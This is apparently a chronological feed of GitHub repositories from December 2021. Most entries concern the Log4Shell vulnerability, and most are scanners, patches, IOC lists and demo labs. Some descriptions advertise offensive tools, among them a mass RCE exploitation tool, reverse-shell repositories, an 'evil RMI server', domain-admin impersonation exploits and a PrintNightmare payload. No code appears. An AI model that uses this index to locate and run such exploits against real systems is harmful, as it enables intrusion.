Data we are receiving from our honeypots about CVE-2021-44228 : honeynet/log4shell-data create time: 2021-12-15T16:10:54Z
no description : fasanhlieu/CVE-2021-2394 create time: 2021-12-15T16:09:54Z
no description : numanturle/CVE-2021-23758-POC create time: 2021-12-15T15:40:45Z
fix cve 44228 for windows : sebiboga/jmeter-fix-cve-2021-44228-windows create time: 2021-12-15T15:34:19Z
a script to locally check jars and packages for log4j CVE‐2021‐44228 : jschauma/check-log4j create time: 2021-12-15T15:29:49Z
HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter. : g30rgyth3d4rk/cve-2021-45043 create time: 2021-12-15T15:01:31Z
no description : robertdebock/ansible-role-cve_2021_44228 create time: 2021-12-15T14:53:17Z
A simple project to check coverage of Log4J vuln CVE-2021-44228 (and related) : MeterianHQ/log4j-vuln-coverage-check create time: 2021-12-15T14:44:14Z
Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions : mss/log4shell-hotfix-side-effect create time: 2021-12-15T13:14:34Z
no description : Junhyunny/log4j-vulnerability-CVE-2021-44228 create time: 2021-12-15T11:36:20Z
This repository is designed to be a collection of resources to learn about, detect and mitigate the impact of the Log4j vulnerability - more formally known as CVE-2021-44228 and CVE-2021-45046 (mirror from GitLab.com) : gitlab-de/log4j-resources create time: 2021-12-15T11:34:02Z
Vulnerability scanner and mitigation patch for Log4j2 CVE-2021-44228 : jyotisahu98/logpresso-CVE-2021-44228-Scanner create time: 2021-12-15T11:15:25Z
Apache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228 : kubearmor/log4j-cve create time: 2021-12-15T10:55:35Z
Identifying all log4j components across all windows servers, entire domain, can be multi domain. CVE-2021-44228 : KeysAU/Get-log4j-Windows.ps1 create time: 2021-12-15T10:49:36Z
Oh no another one : BobTheShoplifter/CVE-2021-45046-Info create time: 2021-12-15T09:01:37Z
no description : anuvindhs/how-to-check-patch-secure-logj4-CVE-2021-45046 create time: 2021-12-15T07:51:28Z
A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations : rgl/log4j-log4shell-playground create time: 2021-12-15T07:51:12Z
no description : avirahul007/CVE-2021-44228 create time: 2021-12-15T06:40:35Z
no description : i6c/MASS_CVE-2021-41773 create time: 2021-12-15T06:04:41Z
Log4j 2.15.0 Privilege Escalation -- CVE-2021-45046 : cckuailong/Log4j_CVE-2021-45046 create time: 2021-12-15T05:48:53Z
This project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228 : bhprin/log4j-vul create time: 2021-12-15T05:19:13Z
Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228 : VinniMarcon/Log4j-Updater create time: 2021-12-15T04:08:15Z
Quick Deploy to show case cve-2021-44228 : JustinDPerkins/C1-WS-LOG4SHELL create time: 2021-12-15T03:20:25Z
Log4j2 jndi injection fuzz tool (CVE-2021-44228) : zhzyker/logmap create time: 2021-12-14T08:41:18Z
Aims to find JndiLookup.class in nearly any directory or zip, jar, ear, war file, even deeply nested. : jeremyrsellars/CVE-2021-44228_scanner create time: 2021-12-15T02:31:14Z
Scanning for CVE-2021-44228 : dbzoo/log4j_scanner create time: 2021-12-15T02:29:34Z
no description : eR072391/cve-2021-21315 create time: 2021-12-15T01:15:56Z
Scanners for Jar files that may be vulnerable to CVE-2021-44228 : CERTCC/CVE-2021-44228_scanner create time: 2021-12-14T23:33:51Z
CVE-2021-44228 Response Scripts : 0xThiebaut/CVE-2021-44228 create time: 2021-12-14T22:50:05Z
Log4j CVE-2021-44228 finder and patcher : xsultan/log4jshield create time: 2021-12-14T22:22:15Z
CVE-2021-44228 Log4J multithreaded Mass Exploitation tool compatible with URL/IP lists. : razz0r/CVE-2021-44228-Mass-RCE create time: 2021-12-14T22:19:29Z
no description : ab0x90/CVE-2021-44228_PoC create time: 2021-12-14T21:32:42Z
A firewall reverse proxy for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks. : mufeedvh/log4jail create time: 2021-12-14T19:29:11Z
A Byte Buddy Java agent-based fix for CVE-2021-44228, the log4j 2.x "JNDI LDAP" vulnerability. : nccgroup/log4j-jndi-be-gone create time: 2021-12-12T15:29:20Z
Simple Spring Boot application vulnerable to CVE-2021-44228 : guerzon/log4shellpoc create time: 2021-12-14T20:27:26Z
Generate CVE-2021-44228 commands to test servers with ease! : csduncan9/Log4j-CVE-2021-44228-command-generator create time: 2021-12-14T20:12:07Z
Tools for investigating Log4j CVE-2021-44228 : MalwareTech/Log4jTools create time: 2021-12-14T19:08:14Z
Scanner to send specially crafted requests and catch callbacks of systems that are impacted by Log4J Log4Shell vulnerability (CVE-2021-44228) : hupe1980/scan4log4shell create time: 2021-12-13T06:09:04Z
MailMasta wordpress plugin Local File Inclusion vulnerability (CVE-2016-10956) : p0dalirius/CVE-2016-10956_mail_masta create time: 2021-12-10T16:06:46Z
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 : BinaryDefense/log4j-honeypot-flask create time: 2021-12-14T18:08:45Z
no description : municipalparkingservices/CVE-2021-44228-Scanner create time: 2021-12-14T17:53:37Z
Grafana8.x 任意文件读取 : Ryze-T/CVE-2021-43798 create time: 2021-12-14T17:05:41Z
no description : yanicksenn/CVE-2021-44228 create time: 2021-12-14T16:42:45Z
A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE CVE-2021-44228 vulnerability. : 0xInfection/LogMePwn create time: 2021-12-14T06:37:59Z
Log4j : corelight/cve-2021-44228 create time: 2021-12-13T17:25:52Z
no description : robiul-awal/CVE-2018-15473 create time: 2021-12-14T15:48:11Z
no description : faisalfs10x/Log4j2-CVE-2021-44228-revshell create time: 2021-12-14T05:24:52Z
Repo containing all info, scripts, etc. related to CVE-2021-44228 : wortell/log4j create time: 2021-12-14T15:13:06Z
CVE-2021-44228 : ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228 create time: 2021-12-14T14:51:26Z
The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell. : ReynerGonzalez/Security-Log4J-Tester create time: 2021-12-14T14:46:08Z
no description : didoatanasov/cve-2021-44228 create time: 2021-12-14T12:47:56Z
Details : CVE-2021-44228 : 34zY/JNDI-Exploit-1.2-log4shell create time: 2021-12-14T12:42:54Z
no description : rwincey/CVE-2021-44228-Log4j-Payloads create time: 2021-12-14T12:37:23Z
Detect vulnerable machines to Log4Shell (CVE-2021-44228) : e-XpertSolutions/log4find create time: 2021-12-14T08:49:37Z
Bash and PowerShell scripts to scan a local filesystem for Log4j components vulnerable to CVE-2021-44228 / Log4Shell. : Occamsec/log4j-checker create time: 2021-12-13T21:11:18Z
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228) : fox-it/log4j-finder create time: 2021-12-14T10:04:42Z
On Thursday (December 9th), a 0-day exploit in the popular Java logging library log4j (version 2) was discovered that results in Remote Code Execution (RCE) by logging a certain string. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short. : jan-muhammad-zaidi/Log4j-CVE-2021-44228 create time: 2021-12-14T09:33:22Z
Little recap of the log4j2 remote code execution (CVE-2021-44228) : cbuschka/log4j2-rce-recap create time: 2021-12-14T08:31:47Z
A script that checks for vulnerable Log4j (CVE-2021-44228) systems using injection of the payload in common HTTP headers. : NorthwaveSecurity/log4jcheck create time: 2021-12-10T14:22:49Z
Endpoint to test CVE-2021-44228 – Log4j 2 : andrii-kovalenko-celonis/log4j-vulnerability-demo create time: 2021-12-14T08:55:43Z
The goal of this project is to demonstrate the log4j cve-2021-44228 exploit vulnerability in a spring-boot setup, and to show how to fix it. : chilit-nl/log4shell-example create time: 2021-12-13T20:54:10Z
Check CVE-2021-44228 vulnerability : codiobert/log4j-scanner create time: 2021-12-14T07:59:14Z
The LPE technique does not need to work with remote RPC or SMB, as it is only working with the functions of Print Spooler. * This script embeds a Base64-encoded GZIPped payload for a custom DLL, that is patched according to your arguments, to easily add a new user to the local administrators group. * This script embeds methods from PowerSploit/PowerUp to reflectively access the Win32 APIs. * This method does not loop through all printer drivers to find the appropriate DLL path -- it simply grabs the first driver and determines the appropriate path. : sh7alward/CVE-20121-34527-nightmare create time: 2021-12-14T07:03:19Z
A Nuclei template for Apache Solr affected by Apache Log4J CVE-2021-44228 : toramanemre/apache-solr-log4j-CVE-2021-44228 create time: 2021-12-14T06:51:30Z
CVE 2021-14527 : sh7alward/Nightmare- create time: 2021-12-14T06:49:32Z
Some siimple checks to see if JAR file is vulnerable to CVE-2021-44228 : gcmurphy/chk_log4j create time: 2021-12-14T05:58:28Z
no description : zjx/CVE-2021-44228 create time: 2021-12-14T05:48:49Z
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading : Woahd/log4j-urlscanner create time: 2021-12-14T04:35:20Z
no description : archongum/cve-2021-44228-log4j create time: 2021-12-14T04:25:13Z
no description : roticagas/CVE-2021-44228-Demo create time: 2021-12-14T04:09:02Z
no description : eR072391/cve-2021-44228 create time: 2021-12-14T03:45:48Z
Sample docker-compose setup to show how this exploit works : alpacamybags118/log4j-cve-2021-44228-sample create time: 2021-12-14T02:26:52Z
Demo project to evaluate Log4j2 Vulnerability | CVE-2021-44228 : sandarenu/log4j2-issue-check create time: 2021-12-14T02:26:56Z
Prova de conceito da vulnerabulidade CVE-2021-44228. : igoritos22/log4jpoc create time: 2021-12-13T23:19:41Z
Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation) : ly4k/Pachine create time: 2021-12-13T23:15:05Z
Find log4j for CVE-2021-44228 on some places * Log4Shell : perryflynn/find-log4j create time: 2021-12-13T22:26:04Z
Tool to check whether one of your applications is affected by a vulnerability in log4j: CVE-2021-44228 : alexbakker/log4shell-tools create time: 2021-12-13T21:47:41Z
PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs : back2root/log4shell-rex create time: 2021-12-13T21:39:51Z
A singular file to protect as many Minecraft servers and clients as possible from the Log4j exploit (CVE-2021-44228). : Koupah/MC-Log4j-Patcher create time: 2021-12-13T14:26:24Z
Log4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS : name/log4j-scanner create time: 2021-12-13T22:11:15Z
GitHub CodeQL Action to scan for CVE-2021–44228 : benarculus/cve-2021-44228-code-scan create time: 2021-12-13T21:57:58Z
Professional Service scripts to aid in the identification of affected Java applications in TeamServer : Contrast-Security-OSS/CVE-2021-44228 create time: 2021-12-13T21:39:39Z
Just a personal proof of concept of CVE-2021-44228 on log4j2 : snatalius/log4j2-CVE-2021-44228-poc-local create time: 2021-12-13T21:21:53Z
exploit for DNS 4.3 : stoicboomer/CVE-2013-6987 create time: 2020-02-13T21:42:24Z
no description : tica506/Splunk-query-for-CVE-2021-44228 create time: 2021-12-13T20:19:57Z
Nmap NSE script for discovery Apache log4j RCE (CVE-2021-44228) : giterlizzi/nmap-log4shell create time: 2021-12-13T20:17:14Z
NGINX njs based request inspection configuration for IOCs of Log4Shell vulnerability : tippexs/nginx-njs-waf-cve2021-44228 create time: 2021-12-13T20:02:12Z
Demonstration of CVE-2021-44228 with a possible strategic fix. : strawhatasif/log4j-test create time: 2021-12-13T19:43:01Z
Using code search to help fix/mitigate log4j CVE-2021-44228 : sourcegraph/log4j-cve-code-search-resources create time: 2021-12-13T07:10:11Z
Compiling links of value i find regarding CVE-2021-44228 : ben-smash/l4j-info create time: 2021-12-13T19:14:23Z
no description : mcedica/fix-cve-2021-44228 create time: 2021-12-13T18:55:55Z
Public IOCs about log4j CVE-2021-44228 : threatmonit/Log4j-IOCs create time: 2021-12-13T18:52:19Z
Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines. : lfama/log4j_checker create time: 2021-12-13T18:35:16Z
CVE-2021-44228 : trevalkov/log4j2-prosecutor create time: 2021-12-13T17:32:26Z
Log4Shell A test for CVE-2021-44228 : yanghaoi/CVE-2021-44228_Log4Shell create time: 2021-12-13T17:44:01Z
File transfers using the log4shell vulnerability (CVE-2021-44228) : Chelsea486MHz/ftp_over_log4j create time: 2021-12-13T17:26:49Z
Automox Windows Agent Privilege Escalation Exploit : gfoss/CVE-2021-43326_Exploit create time: 2021-12-13T17:26:28Z
no description : taurusxin/CVE-2021-44228 create time: 2021-12-13T17:17:37Z
Find Log4Shell CVE-2021-44228 on your system : claranet/ansible-role-log4shell create time: 2021-12-13T16:41:31Z
log4j version 1 with a patch for CVE-2021-44228 vulnerability : p3dr16k/log4j-1.2.15-mod create time: 2021-12-13T16:40:14Z
no description : tobiasoed/log4j-CVE-2021-44228 create time: 2021-12-13T16:04:54Z
Exploiting CVE-2021-42278 and CVE-2021-42287 : waterrr/noPac create time: 2021-12-13T15:24:59Z
demo project to highlight how to execute the log4j (CVE-2021-44228) vulnerability : kossatzd/log4j-CVE-2021-44228-test create time: 2021-12-13T15:11:15Z
Apply class remove process from ear/war/jar/zip archive, see https://logging.apache.org/log4j/2.x/ : AlexandreHeroux/Fix-CVE-2021-44228 create time: 2021-12-13T15:04:31Z
Check if Java allows JNDI remote code exec by default : trickyearlobe/CVE_2021_44228_Check create time: 2021-12-13T14:56:03Z
Some tools to help mitigating Apache Log4j 2 CVE-2021-44228 : madCdan/JndiLookup create time: 2021-12-13T14:22:34Z
Check if your server is vulnerable to the CVE-2021-44228. (node) : AdriDevelopsThings/check-log4j-vulnerability create time: 2021-12-13T14:10:43Z
This tool creates a custom signature set on F5 WAF and apply to policies in blocking mode : irgoncalves/f5-waf-quick-patch-cve-2021-44228 create time: 2021-12-13T13:41:39Z
Mass Check Vulnerable Log4j CVE-2021-44228 : justakazh/Log4j-CVE-2021-44228 create time: 2021-12-13T13:30:57Z
no description : flxhaas/Scan-CVE-2021-44228 create time: 2021-12-13T13:28:26Z
no description : LutziGoz/Log4Shell_Exploitation-Execution__CVE-2021-44228 create time: 2021-12-13T11:29:57Z
Mass recognition tool for CVE-2021-44228 : VNYui/CVE-2021-44228 create time: 2021-12-13T13:25:19Z
Log4j CVE-2021-44228 (Re lte+CE sample) : manuel-alvarez-alvarez/log4j-cve-2021-44228 create time: 2021-12-13T13:08:03Z
no description : zsolt-halo/CVE-2021-44228-Spring-Boot-Test-Service create time: 2021-12-13T13:05:26Z
CVE-2021-44228 - Apache log4j RCE quick test : jeffli1024/log4j-rce-test create time: 2021-12-13T12:35:39Z
CVE-2021-44228 on Podman : ahmad4fifz/CVE-2021-44228-podman create time: 2021-12-13T12:30:11Z
no description : 0xsyr0/CVE-2021-44228-log4j-log4shell-Security-Research-Summary create time: 2021-12-13T11:34:54Z
A PoC for CVE-2021-44827 - authenticated remote code execution in Tp-link Archer C20i : full-disclosure/CVE-2021-44827 create time: 2021-12-13T11:17:12Z
Burp extension to scan Log4Shell (CVE-2021-44228) vulnerability pre and post auth. : 0xDexter0us/Log4J-Scanner create time: 2021-12-13T11:06:46Z
simple python scanner to check if your network is vulnerable to CVE-2021-44228 : sinakeshmiri/log4jScan create time: 2021-12-13T10:59:50Z
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user : Ridter/noPac create time: 2021-12-13T10:28:12Z
no description : Amaranese/CVE-2021-34527 create time: 2021-12-13T10:04:49Z
no description : lov3r/cve-2021-44228-log4j-exploits create time: 2021-12-13T09:58:11Z
Research into the implications of CVE-2021-44228 in Spring based applications. : Camphul/log4shell-spring-framework-research create time: 2021-12-13T09:48:04Z
Dirty Cow kernel exploit without libcrypt dependency : itlabbet/CVE-2021-40839 create time: 2021-12-13T09:47:22Z
CVE-2021-36260 : tuntin9x/CheckHKRCE create time: 2021-12-13T09:23:36Z
CVE-2021-44228 : halibobor/log4j2 create time: 2021-12-13T07:03:50Z
Simple tool for scanning entire directories for attempts of CVE-2021-44228 : kek-Sec/log4j-scanner-CVE-2021-44228 create time: 2021-12-13T08:51:56Z
This repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228 : avwolferen/Sitecore.Solr-log4j-mitigation create time: 2021-12-13T08:46:41Z
Log4Shell Docker Env : ycdxsb/Log4Shell-CVE-2021-44228-ENV create time: 2021-12-13T08:43:45Z
Log4j Remote Code Injection (Apache Log4j 2.x < 2.15.0-rc2) : JiuBanSec/Log4j-CVE-2021-44228 create time: 2021-12-13T08:40:13Z
A lab for playing around with the Log4J CVE-2021-44228 : tuyenee/Log4shell create time: 2021-12-13T08:13:07Z
CVE-2021-44228 log4j mitigation using aws wafv2 with ansible : markuman/aws-log4j-mitigations create time: 2021-12-13T08:01:55Z
no description : helsecert/CVE-2021-44228 create time: 2021-12-13T07:48:49Z
Log4J CVE-2021-44228 : Mitigation Cheat Sheet : thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet create time: 2021-12-13T07:24:02Z
Scanner for Log4j RCE CVE-2021-44228 : thecyberneh/Log4j-RCE-Exploiter create time: 2021-12-13T06:53:01Z
Grafana任意文件读取 : Awrrays/Grafana-CVE-2021-43798 create time: 2021-12-13T06:32:39Z
OpenIOC rules to facilitate hunting for indicators of compromise : fireeye/CVE-2021-44228 create time: 2021-12-13T03:55:32Z
CVE-2021-44228 on Podman : ahmad4fifz-dev/CVE-2021-44228 create time: 2021-12-13T04:29:04Z
a fast check, if your server could be vulnerable to CVE-2021-44228 : rubo77/log4j_checker_beta create time: 2021-12-13T04:14:18Z
A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 : fullhunt/log4j-scan create time: 2021-12-13T03:57:50Z
Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes : 0xRyan/log4j-nullroute create time: 2021-12-13T03:15:42Z
This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228). : pedrohavay/exploit-CVE-2021-44228 create time: 2021-12-13T02:18:57Z
log4J burp被扫插件、CVE-2021-44228、支持dnclog.cn和burp内置DNS、可配合JNDIExploit生成payload : bigsizeme/Log4j-check create time: 2021-12-13T01:55:51Z
CVE-2021-44228. Quick find and mitigate action for Windows OS. : lwsnz/log4j-win-quick create time: 2021-12-13T00:45:48Z
Fun things against the abuse of the recent CVE-2021-44228 (Log4Shell) vulnerability using common web servers. : KainsRache/anti-jndi create time: 2021-12-13T00:23:20Z
Some files for red team/blue team investigations into CVE-2021-44228 : kimobu/cve-2021-44228 create time: 2021-12-13T00:14:45Z
fail2ban filter that catches attacks againts log4j CVE-2021-44228 : atnetws/fail2ban-log4j create time: 2021-12-13T00:14:31Z
no description : maxant/log4j2-CVE-2021-44228 create time: 2021-12-13T00:02:54Z
Test locally an exploit for Log4J2's CVE-2021-44228 (Log4Shell) : sunnyvale-it/CVE-2021-44228-PoC create time: 2021-12-12T23:37:39Z
A micro lab for CVE-2021-44228 (log4j) : tasooshi/horrors-log4shell create time: 2021-12-12T15:44:49Z
no description : DiCanio/CVE-2021-44228-docker-example create time: 2021-12-12T10:53:15Z
no description : nils-trubkin/CVE-2018-6574 create time: 2021-12-12T23:01:07Z
pythonic pure python RCE exploit for CVE-2021-44228 log4shell : dotPY-hax/log4py create time: 2021-12-12T22:55:25Z
Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228) : Diverto/nse-log4shell create time: 2021-12-12T22:52:02Z
no description : LongWayHomie/CVE-2021-43936 create time: 2021-12-12T22:31:00Z
Log4J (CVE-2021-44228) Exploit with Remote Command Execution (RCE) : corneacristian/Log4J-CVE-2021-44228-RCE create time: 2021-12-12T21:52:53Z
Log4Shell CVE-2021-44228 : cyberxml/log4j-poc create time: 2021-12-12T21:45:33Z
Mitigate against log4j vulnerability : palominoinc/cve-2021-44228-log4j-mitigation create time: 2021-12-12T21:28:09Z
Log4j RCE - (CVE-2021-44228) : momos1337/Log4j-RCE create time: 2021-12-12T21:26:44Z
no description : Panyaprach/Proof-CVE-2021-44228 create time: 2021-12-12T20:31:19Z
no description : sn0b4ll/cve-2021-44288_honeypot create time: 2021-12-12T19:34:00Z
Check list of URLs against Log4j vulnerability CVE-2021-44228 : OlafHaalstra/log4jcheck create time: 2021-12-12T18:57:05Z
Spring Boot Log4j - CVE-2021-44228 Docker Lab : twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab create time: 2021-12-12T16:54:33Z
An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228 : Hydragyrum/evil-rmi-server create time: 2021-12-12T16:49:45Z
Apache Druid LoadData 任意文件读取漏洞 / Code By:Jun_sheng : Jun-5heng/CVE-2021-36749 create time: 2021-12-12T15:50:02Z
no description : qingtengyun/cve-2021-44228-qingteng-online-patch create time: 2021-12-12T15:30:55Z
no description : qingtengyun/cve-2021-44228-qingteng-patch create time: 2021-12-12T15:00:04Z
no description : gixxyboy/CVE-2021-43798 create time: 2021-12-12T15:16:55Z
CVE-2021-44228 test demo : fireflyingup/log4j-poc create time: 2021-12-12T14:54:25Z
Apache Druid remote code execution vulnerability - Apache Druid 远程代码执行漏洞利用 : j2ekim/cve-2021-25646 create time: 2021-12-12T14:40:12Z
Known IoCs for log4j framework vulnerability : guardicode/CVE-2021-44228_IoCs create time: 2021-12-12T14:27:28Z
Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE). This list is meant as a resource for security responders to be able to find and address the vulnerability : authomize/log4j-log4shell-affected create time: 2021-12-12T14:05:05Z
no description : lohanichaten/log4j-cve-2021-44228 create time: 2021-12-12T13:59:38Z
Mitigate log4shell (CVE-2021-44228) vulnerability attacks using Nginx LUA script : infiniroot/nginx-mitigate-log4shell create time: 2021-12-12T13:45:08Z
Python script that sends CVE-2021-44228 log4j payload requests to url list : ssl/scan4log4j create time: 2021-12-12T13:28:31Z
Dockerized Go app for testing the CVE-2021-44228 vulnerability : urholaukkarinen/docker-log4shell create time: 2021-12-12T13:19:50Z
IP addresses exploiting recent log4j2 vulnerability CVE-2021-44228 : Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228 create time: 2021-12-12T13:17:18Z
no description : pravin-pp/log4j2-CVE-2021-44228 create time: 2021-12-12T13:00:38Z
Sample log4j shell exploit : kali-dass/CVE-2021-44228-log4Shell create time: 2021-12-12T12:27:39Z
Poc of log4j2 (CVE-2021-44228) : Crane-Mocker/log4j-poc create time: 2021-12-12T11:31:45Z
Abuse Log4J CVE-2021-44228 to patch CVE-2021-44228 in vulnerable Minecraft game sessions to prevent exploitation in the session :) : 0-x-2-2/CVE-2021-44228 create time: 2021-12-12T11:26:42Z
An awesome curated list of repos for CVE-2021-44228. Apache Log4j 2 : RrUZi/Awesome-CVE-2021-44228 create time: 2021-12-12T11:25:00Z
CVE-2021-44228 Minecraft PoC : myyxl/cve-2021-44228-minecraft-poc create time: 2021-12-12T11:22:51Z
no description : mute1997/CVE-2021-44228-research create time: 2021-12-12T11:08:54Z
On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service. The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging library. Log4j is heavily integrated into a broad set of devops frameworks, enterprise IT systems, and vendor software and cloud products. : sud0x00/log4j---CVE-2021-44228 create time: 2021-12-12T10:22:45Z
CVE-2021-44228(Apache Log4j Remote Code Execution) : RK800-DEV/apache-log4j-poc create time: 2021-12-12T10:17:13Z
no description : uint0/cve-2021-44228-helpers create time: 2021-12-12T09:21:09Z
A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228/Log4Shell). : unlimitedsola/log4j2-rce-poc create time: 2021-12-12T01:23:45Z
My take on Log4j2 vulnerability : bchaber/CVE-2021-44228 create time: 2021-12-12T07:39:51Z
log4j2漏洞复现 : creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review create time: 2021-12-12T07:20:03Z
An agent to hotpatch the log4j RCE from CVE-2021-44228. : corretto/hotpatch-for-apache-log4j2 create time: 2021-12-12T01:24:51Z
Script to patch VMware vCenter log4j vulnerability CVE-2021-44228 : blake-fm/vcenter-log4j create time: 2021-12-12T04:23:10Z
Use environment variable to disable lookup. : Ghost-chu/CVE-2021-44228-quickfix-script create time: 2021-12-12T04:17:08Z
Apache Log4j CVE-2021-44228 漏洞复现 : zhangxvx/Log4j-Rec-CVE-2021-44228 create time: 2021-12-11T16:08:34Z
Apache Log4j2 CVE-2021-44228 RCE : mzlogin/CVE-2021-44228-Demo create time: 2021-12-12T03:11:14Z
no description : RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs create time: 2021-12-12T02:59:54Z
Pure Vanilla Python PoC for CVE-2021-44228 : alexandre-lavoie/python-log4shell create time: 2021-12-12T02:57:49Z
docker compose solution to run a vaccine environment for the log4j2 vulnerability CVE-2021-44228 : jeffbryner/log4j-docker-vaccine create time: 2021-12-11T23:06:23Z
This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device : irgoncalves/f5-waf-enforce-sig-CVE-2021-44228 create time: 2021-12-11T21:59:19Z
no description : chilliwebs/CVE-2021-44228_Example create time: 2021-12-11T20:25:08Z
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter. : cube0x0/noPac create time: 2021-12-11T19:27:30Z
This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798). : pedrohavay/exploit-grafana-CVE-2021-43798 create time: 2021-12-11T18:49:30Z
Detections for CVE-2021-44228 inside of nested binaries : darkarnium/CVE-2021-44228 create time: 2021-12-11T16:08:47Z
Test CVE-2018-15473 exploit on Shodan IP : 66quentin/shodan-CVE-2018-15473 create time: 2021-12-11T15:50:57Z
no description : LongWayHomie/CVE-2021-43798 create time: 2021-12-11T16:24:58Z
Simple demo of CVE-2021-44228 : datadavev/test-44228 create time: 2021-12-11T15:33:17Z
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user : WazeHell/sam-the-admin create time: 2021-12-11T15:10:30Z
CVE 2018-20148 and 2019-9168 : tthseus/WooCommerce-CVEs create time: 2019-10-25T03:03:52Z
CVE-2021-44228 : zzzz0317/Log4j2-Vulnerable-App create time: 2021-12-11T15:18:42Z
Public IoCs about log4j CVE-2021-44228 : Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs create time: 2021-12-11T14:54:45Z
proof of concept for CVE-2021-44228 : trevalkov/javalogslulz create time: 2021-12-11T14:34:43Z
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer) : CreeperHost/Log4jPatcher create time: 2021-12-10T09:16:46Z
A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228 : Mormoroth/log4j-vulnerable-app-cve-2021-44228-terraform create time: 2021-12-11T13:56:28Z
Log4j-RCE (CVE-2021-44228) Proof of Concept : PwnC00re/Log4J_0day_RCE create time: 2021-12-11T13:28:52Z
Content to help the community responding to the Log4j Vulnerability Log4Shell CVE-2021-44228 : cado-security/log4shell create time: 2021-12-11T13:03:31Z
List of company advisories log4j : leetxyz/CVE-2021-44228-Advisories create time: 2021-12-11T12:41:38Z
Scan your logs for CVE-2021-44228 related activity and report the attackers : js-on/jndiRep create time: 2021-12-11T12:25:08Z
no description : b-abderrahmane/CVE-2021-44228-playground create time: 2021-12-11T12:16:45Z
Test the CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 : gauthamg/log4j2021_vul_test create time: 2021-12-11T11:41:04Z
no description : vorburger/Log4j_CVE-2021-44228 create time: 2021-12-11T11:38:16Z
Vulnerability scanner for Log4j2 CVE-2021-44228 : logpresso/CVE-2021-44228-Scanner create time: 2021-12-11T11:18:46Z
A simple and harmless example implementation of CVE-2017-5645. : sefayfr/log4j-RCE create time: 2021-12-11T10:35:02Z
A Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads : toramanemre/log4j-rce-detect-waf-bypass create time: 2021-12-11T10:19:01Z
Log4Shell CVE-2021-44228 mitigation tester : lhotari/log4shell-mitigation-tester create time: 2021-12-11T10:16:58Z
no description : byteboycn/CVE-2021-44228-Apache-Log4j-Rce create time: 2021-12-11T09:52:36Z
RDP Client RCE : JaneMandy/CVE-2021-38666 create time: 2021-12-11T09:42:28Z
no description : M1ngGod/CVE-2021-44228-Log4j-lookup-Rce create time: 2021-12-11T07:55:45Z
no description : waseeld/CVE-2021-42574 create time: 2021-12-11T07:23:17Z
CVE-2021-44228,log4j2 burp插件 Java版本,dnslog选取了非dnslog.cn域名 : f0ng/log4j2burpscanner create time: 2021-12-11T07:19:11Z
Fixes CVE-2021-44228 in log4j by patching JndiLookup class : saharNooby/log4j-vulnerability-patcher-agent create time: 2021-12-11T07:16:21Z
no description : SamHackingArticles/CVE-2007-2447 create time: 2021-12-11T04:50:54Z
Test for log4j vulnerability across your external footprint : ssstonebraker/log4j_CVE-2021-44228_tester create time: 2021-12-11T04:34:51Z
A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228. : rakutentech/jndi-ldap-test-server create time: 2021-12-11T03:08:14Z
A short demo of CVE-2021-44228 : phoswald/sample-ldap-exploit create time: 2021-12-11T02:45:39Z
Apache Log4j2 RCE( CVE-2021-44228)验证环境 : 1in9e/Apache-Log4j2-RCE create time: 2021-12-10T15:57:14Z
Vulnerable to CVE-2021-44228. trustURLCodebase is not required. : nkoneko/VictimApp create time: 2021-12-10T15:32:03Z
Apache Log4j 远程代码执行 : tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce create time: 2021-12-09T15:27:38Z
Log4j2 CVE-2021-44228 复现和分析 : binganao/Log4j2-RCE create time: 2021-12-11T02:08:41Z
